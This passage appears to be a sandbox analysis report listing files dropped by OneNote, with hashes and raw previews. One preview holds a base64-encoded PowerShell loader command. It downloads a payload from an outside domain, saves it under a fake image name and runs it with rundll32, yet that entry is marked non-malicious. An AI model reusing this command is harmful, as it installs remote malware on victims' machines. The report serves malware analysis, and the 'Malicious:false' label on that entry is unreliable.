                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                              Entropy (8bit):3.7833419575507463
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:MQN76VQWZO2RcSY1BopAI+seg0RcLYr7jSPR:v76e4REoqI1+Rn7jS
                                                                                                                                                                                                              MD5:567E40821646A5E609772BB82E1B3599
                                                                                                                                                                                                              SHA1:7CA67C50D91952C56C8AD9732BD1B896BF041DC8
                                                                                                                                                                                                              SHA-256:033B9E67C847335DA84BDBA2E04D7BA72446BD88307BD816ED7E84F9C36AA1F1
                                                                                                                                                                                                              SHA-512:ACBBFD39256196A0DDF1E4B27A5739CF984F788117BA378F0EA79CB71187B15022A3D49DCEBBE557A40A7CD0B9CCB1180F4075FF26586FD2B5264DF354BD27B7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:R.......Z...d...<............-..................D..@r...@...X.......................................................................................................................................^........).\.....).\.....).\..o.......op.. O.....q..).\.-6......p.).\..I.qk..B.....LZ.I....op.. O.....q....o..........).\.....).\.....).\.........................................).\j.Q..).\T....).\.....).\..W..).\.....).\..r..).\$....).\..........Z4...................4../4..04..............................p...........................C.a.l.i.b.r.i..........).\..z... ..$............................M0.Q...........C...?......@?..@?...PA...?...A.X.A.............").\#).\..z...,4. ...........$.4..V/.Q...........).\.).\.).\.).\..z...y.. x.. ...........$... ./.Q./.Q.............o..z...;............4...4..?.. ...................................."...a....5...5....Q..........5.7.K.<.O.=.=.K.9. .@.8.A.C.=.>.:...p.n.g..........A...@[ tA..@.......?.ZQ?................z..O......MV.-x}.K.......P........
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1354
                                                                                                                                                                                                              Entropy (8bit):7.799120546917745
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:AXFMpSCdmi2MTbWm/8T368Bf50D+1vDD9BFGBsQ5SOryjJ4w6++mPKc82UGOpIUg:AO4m122bQ36gfaS1rDw2QsOryjJ4xLml
                                                                                                                                                                                                              MD5:C2BF462C1311A92660999498F29394BD
                                                                                                                                                                                                              SHA1:4BD7C156F172C1114F33D80BAB05252C9F8E87C0
                                                                                                                                                                                                              SHA-256:5E0A8F7D863DAD057AC91FB888CFA7BE1D30A6CF65A908CE90081C323A0858B7
                                                                                                                                                                                                              SHA-512:1107117B3C4B843E5EB32CB13C5CA91E28857DDAE18A197F471D9FCA5B767C7441661FC3A21D2B6FF3C6EB91048A93598E1D86EA55A60A427D8E4B82E59A30C9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...(...(........m....sRGB.........pHYs...t...t..f.x....IDATXG..O.W....`...c.C..`.H(!@.[Q..B.D......Q..}.C...}.CTU.MR.j...[.....".x.B.x.wG.2$xf.J..W..g....}w.H.....b* ...../.V_|.....TC]-.d......\\Z..l......>..D....G.....}.]}.x...X...WZ....?.-..A..&x...Q$)U..../.w...?..!8IE..:.....6..y.z..Yg.`g.@(...z...VS..$@..q2.,."....RT.}..%..q.lA0....[m.................2...8..a.LJ....n......M.%x......\...$g.Y.p.Q^U....$;.r.....>...>...]..$...r..bz.P*.(....}:&'ldc...c|.bs.>z.:?.M....(.SR..a..o..*=2....i#..{......y.)....}.1_ .....T@O..F..d....Piu.TQA....#DY.S&G....j....3z..>zL..:...33...C&.S....h...LQk. ...hRSy&m..?...d.....l.].G...BL.-..N;.....s.0Q....T.(0...p....HU..d.V..z.)..2. ..........d...x.{......2.zdP.....;.?aeu......(..,#.....nj.... ....0.X..dr.T)x...4.V...]p8].p.PH.4f{.n.....x.........Z...O>DF.)^.Y.....p.Zf..1e.a.>."fm{.=hui...Fnn.T......./''...U<.,f'........:Y......ckk..RN.....f.omf..rZi.\..h.....|.4.,/......=.z%.F....*Z...>.*.A.....?.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):76485
                                                                                                                                                                                                              Entropy (8bit):7.79809544163696
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
                                                                                                                                                                                                              MD5:734BA03175EBC8B8E3EF57BC3DDC9D8E
                                                                                                                                                                                                              SHA1:1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
                                                                                                                                                                                                              SHA-256:275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
                                                                                                                                                                                                              SHA-512:23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......*......v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1012 x 327
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11765
                                                                                                                                                                                                              Entropy (8bit):7.911655818336033
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:aUpmR1MS7mEuHIgBEoe/nOdV8EHi+rBJZ2M6qhH03NMWjvD5ZktcatNy+AT3jCOj:aUOVTi9EoDH8ujBJwMvhU3mgocatgdOm
                                                                                                                                                                                                              MD5:B035F23C68CC9673E604FE5472F223D2
                                                                                                                                                                                                              SHA1:56495B558547AACCE34C65C1D1FCF6C9ECAFCEE1
                                                                                                                                                                                                              SHA-256:F3F791A1303058D4F363E02F0515DE8484249624857CAF5ECE6C926D7324114C
                                                                                                                                                                                                              SHA-512:B6923EC5D91F5C771B65C63A97AB23BC8E6762CA60C31DEE8D1D141703923EDDFC266229B263EA88E10AF89A92C0EF361BF91A3D5CB600AE129C452D94580662
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:GIF89a..G.................................................................................................................................................................|.................................................................................................Y..Z..\.._..a..c..d..f..e..i..k..m..n..p..s..r..v..y..z..}..~....................0..3..5..6..7..9..<..>..@..B..C..E..G..J..N..N..P..R..T..V..[.................................................. ..!..#..#.."..$..&..&..(..)..+..+..,..,.....1..3..4..6..9..;..=..?..B..E..G..I..L..N..O..Q..S..W..Z..]..^..`..a..b..d..g..h..j..m..p..s..u..x..{..|..~.................................................................................................................................................!.......,......G........H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L....N....8q..i.L....3k.....C..M....S.^....
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:ASCII text, with very long lines (376), with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):376
                                                                                                                                                                                                              Entropy (8bit):5.791466963001911
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:sKHLgyKBM34HR1KCsu2xKthIYWNgvBSuaNaTxEkRcdCe/ydGx8vWHWm+CxhIEXr2:ssLgyaI4HPKC2EwgvBSrkmdhKEAWHB+D
                                                                                                                                                                                                              MD5:DE85AF8741A255BEE889294D26CB536A
                                                                                                                                                                                                              SHA1:DC1964B10E6D1513A5F414608DB4CD3F19B865E5
                                                                                                                                                                                                              SHA-256:A7785E460E6CF4B147A981BB91F62842D2386A23F00EAEEEFFF13E6C4DFE2F7D
                                                                                                                                                                                                              SHA-512:9D90493F9B366D5A238BA7BF398F3CB24A8DDD27817FF10A24B180A9CA62087C3A6B0D575CC7B36E6AC832EF0E476B3D8350F91333C5F13731E3AD421814115C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo=')) > C:\ProgramData\in.cmd&&start /min C:\ProgramData\in.cmd
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):76485
                                                                                                                                                                                                              Entropy (8bit):7.79809544163696
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
                                                                                                                                                                                                              MD5:734BA03175EBC8B8E3EF57BC3DDC9D8E
                                                                                                                                                                                                              SHA1:1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
                                                                                                                                                                                                              SHA-256:275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
                                                                                                                                                                                                              SHA-512:23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......*......v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.5246161936986637
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:8hs4s1lBngY+gnlEQzUkThFDn1O3t84oLgndaJI+:8hs4s1lBnlHVU3Ma6
                                                                                                                                                                                                              MD5:E94DDF5CD721FACCA42274F6CDA1D942
                                                                                                                                                                                                              SHA1:0BD9B0D67AC8F7BEDF8840CFD53A5892E41A1398
                                                                                                                                                                                                              SHA-256:3DC1D5A9871D19B5B351A7CE6930030619B504B8A29D097E09A44F086CA1221D
                                                                                                                                                                                                              SHA-512:0BB562C231A7237B5511A7B22000378C54D49887C1A14CF3DA9F46AC987C930542DE6B0DDA3696FEA11A9589BFE164B9BE97C068F2C2AC3EE05474C6539D027E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........x.......................................................................................................................................2...>...........x...,...2...>...X.......x........-S......-S...@H..`......Rr......Rrj.^L.w.4].%d.-S...@H..`......-S..Rrj.^L.w.4].%d.Rr...........................Rr...................................................................5......-......G.)9.....................Rr.........................................................'..F{.@.5..b.[7...............................L..I.d......h...N....................................................................'..F{.@.5..b.[7...............L..I.d............-S......-S..................................................-S..1...-SX.4.......................................................0...e.......d..I.M.F..n ]...pz.$-;...................4......(...(...........8.....?...............................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.9012312896576654
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:XaE567jclalXsDHjsD6rjXjgtn/llSK9dtJCRdVlZKQL1F3mVXED6JllsOxNHXpJ:X6MlalXsbjsYklEgR2FuEDoktE0
                                                                                                                                                                                                              MD5:8DC6F9FD87CFC81B314B9B09D86AB5D8
                                                                                                                                                                                                              SHA1:919C85CC5B2B109749BC25FD4E9DC97A1059008A
                                                                                                                                                                                                              SHA-256:3FC9CD3DD6E94BCCCC93AED05E969C5D6B49A1E96270F277528B6C9063C7CF5C
                                                                                                                                                                                                              SHA-512:BAEEE183816EB4820604ED2C1270FE6C5F5B0FE635E61677389C76BBE1500883DE2202D0AE5CD368172CEB99B75144AAAC8E5D70B5B586B0E825080023F34EBA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........x................................................................................................................................................................................................B..C...e..l..........D;..C.:.).....D;..C.:.)........B..C...e..l..................................................................................................5......-......G.)9..............................................................................%.|q-;OC.=+}.g}M...........................@B.iH...7.Y.....h...N...................................................................%.|q-;OC.=+}.g}M...........@B.iH...7.Y........................................................................6....`.1............................................................4..~...1...(...(.......Q.u.i.c.k. .N.o.t.e.s.......Q.u.i.c.k. .N.o.t.e.s...........1.......Q.u.i.c.k. .N.o.t.e.s.............................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.697949331746655
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:oOWb9+GxjzxyLdKxhEgLiUICKF8mEwBWbQ:ch+Mjz8LdihEgLPIC28DwgU
                                                                                                                                                                                                              MD5:AEBA9CDF13827B0EE0081A699FF46F62
                                                                                                                                                                                                              SHA1:75935183406057D68DFE863B9F1FF05050757EB0
                                                                                                                                                                                                              SHA-256:AA7065B232651B6B8177511EA2C765A02192A34AAC1639AD1AF90B1338296719
                                                                                                                                                                                                              SHA-512:D0F26655CE34F3A12341318DE5DB8EC6084DBA04113F5EC6E1095A0A3ABEF3FD559A6F74F45A0794DA0B7F145E8C8CE20CAC7F2D0E3EC1C50B96DAC179E544CF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:j..@...@<.......(.......................................................................................................................................j..@...@t.......(...............................ZS......ZS...]....].....s>......s>.NuE...1Y.E...`.z@..#..a......`....x....U..5p......k.L...v.j......k............k.......k..................................................`.......`.z@..#..a......k.......k.L...v.j....2.......^................... ...ZS...s>...`...k........k.........s>T.7....k.......kX......k..2....k..l.....T.N..k..T%q...m.T$........s>.........c..,0...e...B4.$..........C@RQ.H..B......Y..............................x....U..5p.k.......k....k/J...{F<..$u.".4..8..ua/j.$u...s>.NuE...1Y.E..s>..).zv:F......(.)......>..................x....U..5p...k.L...v.j.....).zv:F......(......k.......ZS...c..,0...e...B4.$...........I...M.....0...............................0...........e....4..................T.i.t.l.e.......|{....B.l...R......(....Y......(...D...L.e.c.t.u.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                              Entropy (8bit):4.694216053495659
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:OBsZ0qpgLdL9Ybhf+gBws9yzXXVAwRiPw:OWN0d5YVfD4nSwRi
                                                                                                                                                                                                              MD5:8F3DA84064DF55D8B0115411676E28BB
                                                                                                                                                                                                              SHA1:503EC80EE4BB4D2562E4C313F124053670ECF506
                                                                                                                                                                                                              SHA-256:B7A0321C44FA8CD3AE810839A784BC1AD55CFD03EBF99281C7DBDF5CA89AD2AB
                                                                                                                                                                                                              SHA-512:69B0EA98ABEBCBE4D0578FB0B8124BD484299FDF3038754CDE6E9C8C329744AD5DE7682D79AECF1D687C42CD56138849A8651B8AC1F5A3C4144423A3A048288D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......D...v...8...................................................................................................................................2...>... .......v...l............................I.......I.qk..B.....LZw?..4...w?..|#..'..Tx...w?..|#..'..Tx...w?...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............6..........=.H....N...^................._..mG....`.9............@f....................................I.qk..B.....LZ.............6..........=.H.........6..........=.H.........w?......w?......w?..........................................w?.j....w?.T%...w?......w?...7..w?.H....w?. ....w?.$....w?...~...............;........4...4...4.............w?.:w?.Yw?.Zw?...z...y.. x.. ...........$........&..$...7...7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.7....................Hw?...z... ..$......................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):40884
                                                                                                                                                                                                              Entropy (8bit):7.545929039957292
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                                                                                                                              MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                                                                                                                              SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                                                                                                                              SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                                                                                                                              SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):4.391214765800034
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:c6b5skvfH8LgmkH+0T9l91ut7FUYcsQXTPoRkbOBtkJo5XNV9c66Hh81qLzX4Gq1:cVOP43kLTV1gGxrTPoRkbOBtkWdxcJqH
                                                                                                                                                                                                              MD5:1C6F61E3F35256341FBB5F2C54BBC2DD
                                                                                                                                                                                                              SHA1:9CCA72D022060A7497186B7D2BDD4B41F9A633CF
                                                                                                                                                                                                              SHA-256:11B330D434E45D1BB4C55754F549DBC8904EC4BDB46A45AD73E796F956A4A74D
                                                                                                                                                                                                              SHA-512:A32955D7AF97FF65FB0A8ED914C4586D37745801261C290F9183EF803E8D7EBDBF603B92C86CBEDD4FFE6BECB309A65B0DC0D0EFEC8467999A4D223A9557E2D8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...v.......v.......@ ..X)..2...>...2.......v.......@...H(...........................................................................................................................................I.......I.qk..B.....LZ....H..........0^S..........0^S........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............oZ^.f....~..k./....N...^...............8X.....I...8_.4..................................................I.qk..B.....LZ............oZ^.f....~..k./................................................................................................j.......T%a.......5...............z......................M...............;........4...4...4................3...L...S...K.....z...y.. x.. ........ ..$...$........D..........7...7.........*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.9....................................;.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):24268
                                                                                                                                                                                                              Entropy (8bit):6.946124661664625
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                                                                                                                              MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                                                                                                                              SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                                                                                                                              SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                                                                                                                              SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):4.638047335088087
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:Ts7oFDIPhjvGn5SxuZ2Mfa+9BuHX10WxVORpJOAI59ciWROUmgIvq7VCY:I0FsJjE5SxERfrLu31cRpJtIDc8qeqJ
                                                                                                                                                                                                              MD5:EFEE69ACB8327E8B41BB0A7A593B9F21
                                                                                                                                                                                                              SHA1:E361B7232B710367C4742852CF430FA210BCF4F6
                                                                                                                                                                                                              SHA-256:3734F255218780A808F8F17DF7980ED584D5ED98280D897D4680977F4259FFC3
                                                                                                                                                                                                              SHA-512:1DB40DD73D6B1F6F7EC4E4312EE89E3DFD48F98C7CC38C8FFD7679DF785221EEDC69F16EBFE25DBBB0E59FCBE50EECF0389BE952732113DAA5151D9A57A178F7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...&...j...v...>.... ...,..2...>...........v.......@....+...........................................................................................................................................I.......I.qk..B.....LZ..N.N.....NY.Q.......<X..NY.Q.......<X..N..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............A.G.....-.<V.......N...^...................-.E.lV6...w............t....................................I.qk..B.....LZ............A.G.....-.<V......................................N.......N.......N...........................................Nj......NT(.....N.......N..@....N..c....N..p....N$.\.$..N$.................;........4...4...4...............N3..N...N..z...y.. x.. ...........$...........7...7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.6..............z.......R......................7............S.y.m.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):39010
                                                                                                                                                                                                              Entropy (8bit):7.362726513389497
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                                                                                                                              MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                                                                                                                              SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                                                                                                                              SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                                                                                                                              SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):3.9005029259096204
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:zs+97lqSjjWHw+NqWxZKo888fgM4EqWCEp48iU1YPwYMXKEJMRJbXeilQRec6nze:ou7lFjyHw+Nqon8/X/mEp4XU1UwvXKc6
                                                                                                                                                                                                              MD5:06AD29E0413C366EA8A6AE3D640D10E6
                                                                                                                                                                                                              SHA1:5D48675BC35F385CBA53B7704BDB8AA8A98F4F4E
                                                                                                                                                                                                              SHA-256:9494D8947474E73C8ACFCF42BB2D00DED07D18934A0D012A8F73314040BECE13
